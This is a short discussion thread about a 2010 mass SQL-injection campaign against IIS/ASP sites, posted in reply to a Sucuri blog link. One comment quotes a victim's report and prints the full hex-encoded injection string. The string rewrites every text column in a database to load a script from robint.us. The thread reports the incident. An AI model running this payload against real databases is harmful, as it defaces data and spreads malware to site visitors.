

Mass infection of IIS/ASP sites - intljobs.org, wsj.com and many others affected - sucuri2
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html

======
SQueek
found on the web:

We got hit through some old classic asp pages two days ago.

The attack looks like it appends the following to query parameters:

;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420612E6E416D452C622E6E416D452046724F6D207359734F624A6543745320612C735973436F4C754D6E53206220774865526520612E69443D622E694420416E4420612E78547950653D27752720416E442028622E78547950653D3939206F5220622E78547950653D3335206F5220622E78547950653D323331206F5220622E78547950653D31363729206F50654E207441624C655F637572736F52206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C4063207768696C6528404066457443685F7374617475733D302920624567496E20657865632827557044615465205B272B40742B275D20734574205B272B40632B275D3D727472696D28636F6E7665727428766172636861722838303030292C5B272B40632B275D29292B63417354283078334337333633373236393730373432303733373236333344363837343734373033413246324637373737324537323646363236393645373432453735373332463735324536413733334533433246373336333732363937303734334520615320764172436841722835312929207768657265205B272B40632B275D206E6F74206C696B6520272725726F62696E742527272729206645744368206E6578742046724F6D207441624C655F637572736F5220694E744F2040742C406320654E6420634C6F5365207441624C655F637572736F52206445416C4C6F43615465207441624C655F637572736F523B2D2D%20eXEc(@s)--

It appends the script to all text fields in the database. I don't think it has
anything special to do with IIS/ASP.

------
sucuri2
A google search finds more than 1,000,000 pages infected:

[http://www.google.com/#hl=en&source=hp&q=http%3A%2F%...](http://www.google.com/#hl=en&source=hp&q=http%3A%2F%2Fww.robint.us%2Fu.js&btnG=Google+Search&aq=f&aqi=&aql=&oq=&gs_rfai=&fp=8de5ecd1cb5092c9)

